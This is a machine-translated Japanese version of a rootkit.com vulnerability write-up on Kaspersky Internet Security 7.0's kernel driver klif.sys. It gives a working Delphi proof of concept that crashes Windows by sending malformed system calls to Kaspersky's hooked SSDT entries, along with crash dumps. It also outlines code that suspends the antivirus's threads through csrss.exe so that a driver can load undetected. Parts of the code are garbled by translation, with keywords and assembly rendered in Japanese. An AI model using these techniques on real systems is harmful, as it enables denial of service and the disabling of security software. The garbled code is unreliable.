カスペルスキーバックドア6/7

rootkit.comからの記事の翻訳

前文

カスペルスキーアンチウイルスは、今日最も技術的に高度なアンチウイルスの1つです。 生きていて攻撃を試みている場合でも、いくつかのタイプのルートキットと戦うことさえできます。

Proactive Defense Moduleがあります。これは、理論的には、プログラムの動作を分析し、不正なアクションを防止することにより、未知の脅威からコンピューターを保護できる部分的なHIPS実装です。

これはすべて理論と広告のスローガンです。 現実には、まったく異なる状況があります。 アンチウイルスによってまったく検出されないルートキットが多くあり、攻撃者がドライバーをロードできるようにプロアクティブな防御を抑制することができ、その後プロアクティブな防御はまったく役に立たなくなります。

この記事は、エラーと脆弱性の概要だけではありません-各パートの最後に、ウイルス対策開発者に推奨事項を示します。これらのエラーを自分で処理することはできないためです。 そして、支持者のために、すぐに予約があります：もちろん、以下に書かれているものはすべて重大な脆弱性ではありません、いいえ、いいえ=）など、一般的に、心にあまり取りすぎないでください。

この記事で説明するカスペルスキーのバージョンは7.0、最後のパブリックビルドは125、製品タイプはインターネットセキュリティです。

カスペルスキーとシステムサービス記述子テーブル

ウイルス対策のこの部分は、最も脆弱なものとして長い間知られています。 多くの基本的なエラーが含まれているためです。 これらのエラーは、不十分なプロアクティブな防御のもう1つの例です。

Windows XPでは、Kaspersky Anti-VirusはSSDTテーブルにサービスを追加します。 Windows 2003のみに存在する多くのサービス。それらの番号は284〜296です。klif.sys内のアドレスを持つ約13の不明なエントリ。

ここにあります：

ntkrnlpa.exe-> UNKNOWN_SSDT_ENTRY、[C：\ WINDOWS \ system32 \ drivers \ klif.sys]にある0xF809BD80フックハンドラー
ntkrnlpa.exe-> UNKNOWN_SSDT_ENTRY、[C：\ WINDOWS \ system32 \ drivers \ klif.sys]にある0xF809BD90フックハンドラー
ntkrnlpa.exe-> UNKNOWN_SSDT_ENTRY、[C：\ WINDOWS \ system32 \ drivers \ klif.sys]にある0xF809BDA0フックハンドラー
ntkrnlpa.exe-> UNKNOWN_SSDT_ENTRY、[C：\ WINDOWS \ system32 \ drivers \ klif.sys]にある0xF809BDC0フックハンドラー
ntkrnlpa.exe-> UNKNOWN_SSDT_ENTRY、[C：\ WINDOWS \ system32 \ drivers \ klif.sys]にある0xF809BDE0フックハンドラー
ntkrnlpa.exe-> UNKNOWN_SSDT_ENTRY、[C：\ WINDOWS \ system32 \ drivers \ klif.sys]にある0xF809BE10フックハンドラー
ntkrnlpa.exe-> UNKNOWN_SSDT_ENTRY、[C：\ WINDOWS \ system32 \ drivers \ klif.sys]にある0xF809BE20フックハンドラー
ntkrnlpa.exe-> UNKNOWN_SSDT_ENTRY、[C：\ WINDOWS \ system32 \ drivers \ klif.sys]にある0xF809BE40フックハンドラー
ntkrnlpa.exe-> UNKNOWN_SSDT_ENTRY、[C：\ WINDOWS \ system32 \ drivers \ klif.sys]にある0xF809BE50フックハンドラー
ntkrnlpa.exe-> UNKNOWN_SSDT_ENTRY、[C：\ WINDOWS \ system32 \ drivers \ klif.sys]にある0xF809BF10フックハンドラー
ntkrnlpa.exe-> UNKNOWN_SSDT_ENTRY、[C：\ WINDOWS \ system32 \ drivers \ klif.sys]にある0xF809BFE0フックハンドラー
ntkrnlpa.exe-> UNKNOWN_SSDT_ENTRY、[C：\ WINDOWS \ system32 \ drivers \ klif.sys]にある0xF809C020フックハンドラー
ntkrnlpa.exe-> UNKNOWN_SSDT_ENTRY、[C：\ WINDOWS \ system32 \ drivers \ klif.sys]にある0xF809C060フックハンドラー

これは何ですか 完全に理解不能です。 ただし、KAV開発者は、Windows XPおよび2003でのSSDTテーブルのエントリ数が異なる問題を解決するためにそれらを追加しているようです。これが3番目の質問である理由。

そして今、注意：これらのエントリのいずれかがハッキングされる可能性があり、その後、 最小限の特権を持つゲストアカウントの下からでも、BSODでシステムクラッシュが発生します。 私たちは小さなプログラムを書きました。 SSDTのこれらの不可解なエントリに対して、不正なパラメーターを使用して不正なシステムコールを生成します。 コードは非常にシンプルですが、効果的です。 Windows自体がこのような状況を正しく処理するため、純粋なWindowsで実行しても何も起こりません。

var
Services: array[0..12] of ULONG;
ThreadTerminated: boolean = false;
ExecThread: THANDLE;

function MakeSysCall(SysCallNumber: integer; const Stack: PDWORD): DWORD; stdcall;
asm
mov eax, SysCallNumber
mov edx, Stack
int 2eh
mov Result,eax
end;

function exec(p1: pointer): DWORD; stdcall;
var
i: integer;
p2: DWORD;
p3: DWORD;
begin
randomize();
u := 0;
for i := 0 to 12 do Services[i] := 284 + i;
while not ThreadTerminated do
begin
p2 := random($FFFFFFFF);
p3 := Services[random(12)];
MakeSysCall(p3, @p2);
Sleep(100);
end;
CloseHandle(ExecThread);
ExecThread := 0;
result := 0;
end;

var
p2: DWORD;
begin
ThreadTerminated := false;
ExecThread := CreateThread(nil, 0, @exec, nil, 0, p2);
end;


実行結果：カスペルスキーインターネットセキュリティv7.0 125ビルド

PAGE_FAULT_IN_NONPAGED_AREA（50）
無効なシステムメモリが参照されました。 これはtry-exceptでは保護できませんが、
プローブで保護する必要があります。 通常、アドレスは単純に悪いか、または
解放されたメモリを指しています。
引数：
Arg1：e0ae15f9、メモリ参照。
Arg2：00000000、値0 =読み取り操作、1 =書き込み操作。
Arg3：f8087e8c、ゼロ以外の場合、不良メモリを参照した命令アドレス
住所。
Arg4：00000000、（予約済み）

すべてのBSODテキスト...

しかし、それだけではありません！
SSDTの既存の脆弱性の報告にもかかわらず、カスペルスキーの開発者はまだそれらを修正していません！
NTCALLと呼ばれる単純なプログラムでこれを証明できます。 起動後、不正なシステムコールの生成を開始します。

NtCreateSection-無効なパラメーターでこの関数を呼び出すと、klif.sysでBSODが発生します。
これがBSODです。

KERNEL_MODE_EXCEPTION_NOT_HANDLED_M（1000008e）
これは非常に一般的なバグチェックです。 通常、例外アドレスは特定します
問題の原因となったドライバー/機能。 常にこのアドレスに注意してください
このアドレスを含むドライバー/イメージのリンク日付も同様です。
一般的な問題には、例外コード0x80000003があります。 これはハードを意味します
コード化されたブレークポイントまたはアサーションがヒットしましたが、このシステムは起動しました
/ NODEBUG。 開発者が持つべきではないので、これは起こるはずがありません
小売コードにブレークポイントをハードコーディングしましたが、...
この場合は、デバッガーが接続されていることを確認し、
システムが起動/デバッグされます。 これにより、このブレークポイントがなぜであるかがわかります。
起こっている。
引数：
Arg1：c0000005、処理されなかった例外コード
Arg2：805883ea、例外が発生したアドレス
Arg3：f669a95c、トラップフレーム
Arg4：00000000

デバッグの詳細：
-分析：サイズが不明なカーネル。 既知のサイズのシンボルを強制的にリロードします。
分析：強制再読み込みコマンド：.reload / f ntoskrnl.exe = FFFFFFFF804D7000,214600,41108004
*****カーネルシンボルが間違っています。 分析を行うにはシンボルを修正してください。

MODULE_NAME：klif

すべてのBSODテキスト...

私は何と言うことができますか？.. SSDTでの変態をやめ、SSDTレコードの通常のハンドラーを書く時が来ました。 良くして、 オレグ・ザイツエフにSSDTでフックを正しく設定する方法を聞いてください;）

カスペルスキーとシャドウSSDT（シャドウSSDT）

シャドウSSDTは、ユーザーグラフィックインターフェイス（GDI）の表示に関連するシステム機能のアドレスを含むwin32k.sysの特別なテーブルです。 カスペルスキーは、キーロガーを防ぐためのサービスや自己防衛のために、ここにフックをインストールします。

また、フックの設定が不十分です。

NtUserSendInputのパラメーターが正しくなく、...->ハハ、新しいBSOD、これはBSODジェネレーターを思い出させませんか？ =）

PAGE_FAULT_IN_NONPAGED_AREA（50）
無効なシステムメモリが参照されました。 これはtry-exceptでは保護できませんが、
プローブで保護する必要があります。 通常、アドレスは単純に悪いか、または
解放されたメモリを指しています。
引数：
Arg1：e1f83004、メモリ参照。
Arg2：00000000、値0 =読み取り操作、1 =書き込み操作。
Arg3：f9417eee、ゼロ以外の場合、不良メモリを参照した命令アドレス
住所。
Arg4：00000001、（予約済み）

デバッグの詳細：
-分析：サイズが不明なカーネル。 既知のサイズのシンボルを強制的にリロードします。
分析：強制再読み込みコマンド：.reload / f ntoskrnl.exe = FFFFFFFF804D7000,214600,41108004
*****カーネルシンボルが間違っています。 分析を行うにはシンボルを修正してください。

MODULE_NAME：klif
すべてのBSODテキスト...

この部分の推奨事項は簡単です-デバッガーの下でドライバーを実行します。

次のコード

var
p1：PChar;
始める
p1：= PChar（$ ffffffff）;
LoadLibraryA（p1）;
終わり;

はアクセス違反につながり、これは正常です。関数に誤ったパラメーターを使用したためですが、正常ではないのはアドレス-0xF80B3306でアクセス違反が発生する場所です。
これは冗談ではありません-0xF80B3306。 コアプロセスで！ そして、より正確には-klif.sysで。

何が起こるか見てみましょう。

システム内のプロセスごとにIAT（ 1、2 ）の強力な修正が見つかりました。 explorer.exeで何が起こるかを見る

[420] explorer.exe-> kernel32.dll-> LoadLibraryExA、タイプ： アドレス 0x010010A8のIAT変更 -> [kernel32.dll]にある7C882FB0フックハンドラー
[420] explorer.exe-> kernel32.dll-> LoadLibraryExW、タイプ： アドレス 0x010010F8のIAT変更 -> [kernel32.dll]にある7C882FD8フックハンドラー
[420] explorer.exe-> kernel32.dll-> LoadLibraryA、タイプ： アドレス 0x01001150のIAT変更 -> [kernel32.dll]にある7C882F9Cフックハンドラー
[420] explorer.exe-> kernel32.dll-> LoadLibraryW、タイプ：[AT]のアドレス0x010011D0での変更-> [kernel32.dll]にある7C882FC4フックハンドラー
[420] explorer.exe-> kernel32.dll-> GetProcAddress、タイプ：アドレス0x010011E4のIAT変更-> [kernel32.dll]にある7C882FECフックハンドラー

奇妙ですね。 LoadLibraryAの呼び出しを追跡しましょう。

KERNEL32.LoadLibraryA：

ebpをプッシュ
mov ebp、esp
いや
ポップebp
jmp + $ 7b830b4a //-klif.sysへのリダイレクト
いや
いや
いや
いや
いや
いや
いや
いや
いや
いや

これは、Kaspersky Anti-VirusによってIATがリダイレクトされた後のkernel32.dll内のLoadLibraryAの外観です。 それは倒錯ではありませんか？

このアンチウイルスをコンピューターにインストールすると、カスペルスキーアンチウイルスのおかげで作成された追加の脆弱性とバックドアを見つけるために（なんと皮肉なことでしょう！） 笑い、そしてそれ以上。

この部分では、Kaspersky開発者が製品から倒錯を削除することをお勧めします。 第一に、カーネルプロセスと通信するためのより優れた、より簡単な方法があり、第二に、それは単なる倒錯です。

カスペルスキーアンチウイルスと自己防衛

ほとんどの人が知っているように、Kaspersky Anti-Virusは攻撃から積極的に保護します。 そのプロセスは、不正アクセスや悪意のあるプログラムによる破壊から保護されています。 しかし、問題は、どれだけ保護されているのかということです。

回答：悪い。

カスペルスキーは、SSDTにいくつかのフック（NtOpenProcess、NtOpenThread、NtTerminateProcessなど）とShadow SSDTにいくつかのフック（NtUserFindWindowEx、NtUserBuildHwndListなど）をインストールして、攻撃からさらに保護します。

最終的に、エラーが発生すると、再起動設定を使用してサービスとして自身をインストールします。 サービス設定は、SSDTのいくつかのフックによってレジストリで保護されています。 それでは、このウイルス対策をどのように殺すことができますか？ そして、彼を殺す必要がありますか？ avp.exeの視覚部分を強制終了すると、サービスによって再起動されます。 サービスを強制終了すると、サービスコントロールマネージャー（SCM）によって起動されます。 それでは、どうしてこのアンチウイルスを破壊できますか（もちろん、教育目的で）？ 質問は良いです。

答えは簡単です。ドライバーをダウンロードしてください。その後、KAVの対象ゾーンから外れます。 しかし、最初に、この機会を得るためにそれを中断する必要がありますよね？ そうでもない。 カスペルスキープロアクティブディフェンス7.0からわずかに反応することなく、ドライバーを静かにダウンロードできる少なくとも3つの方法があります。 そして、私はまだ方法があると確信しています。 この場合、Kaspersky Anti-Virusプロセスのすべてのスレッドを一時停止します。 ただ一時停止し、それ以上は何もありません-それで十分です。

SSDTの所有者はPDMであるため、Kasperskyプロセスに直接アクセスすることはできません。 それでは、 csrss.exeと呼ばれる「お気に入り」のバックドアプロセスを使用します。

この例では、KAVアプリケーションの名前がavp.exeであり、csrss.exeが1つのインスタンスに存在すると仮定します（LOL、はい、ring3で実行されているマルウェアがcsrss.exeに偽装している場合、このコードには特定の問題があります） ）

...
pBuffer.dwSize：= sizeof（PROCESSENTRY32W）;
SnapShotHandle：= CreateToolHelp32SnapShot（TH32CS_SNAPPROCESS、0）;
...
if（ZwOpenProcess（@ph、PROCESS_ALL_ACCESS、@attr、@ cid1）<> STATUS_SUCCESS）その後終了します;
...
ZwAllocateVirtualMemory（GetCurrentProcess（）、 buf 、0、@bytesIO、MEM_COMMIT、PAGE_READWRITE）;
ZwQuerySystemInformation（SystemHandleInformation、buf、4194304、@ bytesIO）;
すべてのプログラムテキスト...

その後、両方の実行可能なKasperskyモジュールが中断され、ドライバーをロードして静かに作業を行うことができます=）

デフォルト設定でKIS v7.0ビルド125でテスト済み。
Windws XP SP2、管理者権限。

ユーザーアカウントをHANDLE_TABLEに移動し、そのプロセスのハンドラーのアクセス権を変更することをお勧めします。 さらに、NtDuplicateObjectのフックを改善するときが来ました。

エピローグ

あなたはおそらく、なぜこのような明らかなエラーなのか、最も人気のあるアンチウイルスの1つに本当にバックドアが存在するのかと自問していますか？ はい、Kaspersky Labの下で誰かが良い仕事をするべきだからです。

少し前に、私たちはKAVエラーの別のレビューを公開しました。 反応が予想されました。 彼らは「心配しないでください。これらは重大なエラーではありません。」 ええ、はい、おそらくゲストアカウントの下からの死のブルースクリーンは、会社にとってそれほど大きな問題ではありません。 「本当に。 一般的にBSODのためのチェ？ でたらめ、リラックスしてください ":)しかし、何かが変わっています-彼らは公開されたいくつかの脆弱性を閉じたので、私たちに少し感謝する必要があります。 代わりに、$ @％$＆＃の束を取得します！ （もちろん非公式に）あなたの住所に。 まあ、私たちはそのような反応を心配しないので、自分自身を気にしないでください（狂信者？）。 私たちは自己宣伝を望んでおらず、カスペルスキーからの愚かなBSODを見たくない。

Kaspersky Labの開発者の皆様、お使いのウイルス対策は非常に優れています。疑いはありませんが、これらのバグを修正する時が来たのではないでしょうか。 SSDT / IATから倒錯を削除します。 ドライバーの重大な状況をより慎重に処理してください。 真剣ではありませんが、何が問題なのでしょうか？ klif.sysを見ると、 大きなバグのあるドライバーが1つしかありません。

ちなみに、この素​​晴らしい記事で、以前のklif.sysのレビューに対するKaspersky Labからの非公式の回答を読むことができます。これには、いくつかの馬鹿げた声明や無意味なコメントが含まれています。 簡単に言うと、この記事の著者は、古い製品と新しい製品の脆弱性に関する情報を公開していると部分的に非難しました。

www.viruslist.ru/analysis?pubid=204007553

記事はロシア語ですが、英語版が見つかるはずです。

楽しんでください
VX天国から
EP_X0FF / UG北

rootkit.com


smartov：彼らが最後に語る記事からの引用

近年、以下の状況が非常に重要です。 サイバー犯罪者（または白い帽子の後ろに隠れている「研究者」）の環境の誰かが、現代の保護手段を迂回するコードコンセプトを開発しています。進歩の世話をするように見せかけた自己PRの目的で、それを「検出不能」として公開しています。 私たちは強調します：もちろん、実際には、そのような概念は基本的に検出不可能ではありませんが、保護装置の既知の機能の1または2段階バイパスのレベルでは検出できません。 保護メカニズムがわかっている場合、このような1ステップのバイパスを作成するのは非常に簡単です。

このような公開により、マルウェアやウイルス対策の動作原理に詳しくないユーザーの一定の割合が心配するようになります（「ウイルス対策ツールはこの新しい種類の脅威から保護しますか？」）。 このような状況では、保護装置のメーカーは、信頼性を回復するためにリソースの一部を投入することしかできません。説明された概念を回避するための技術を開発します。 その結果、権限が復元されますが（他の方法は？）、システム「マルウェア-ウイルス対策-ユーザー」は元の状態になり、プロセスはループで終了します。 その新しい反復のそれぞれは、ますます洗練されたマルウェアとますます重いセキュリティツールを生成します。

KVNの場合：「素晴らしい計画！」。 このような虚偽自体が脆弱性を公開しているため、貧弱なアンチウイルスメーカーはキャベツの散髪から脱却し、新しい改良されたユーザーインターフェイスを開発して修正する必要があります。

ps最もインストールされているKAV 7.0.0.125 ...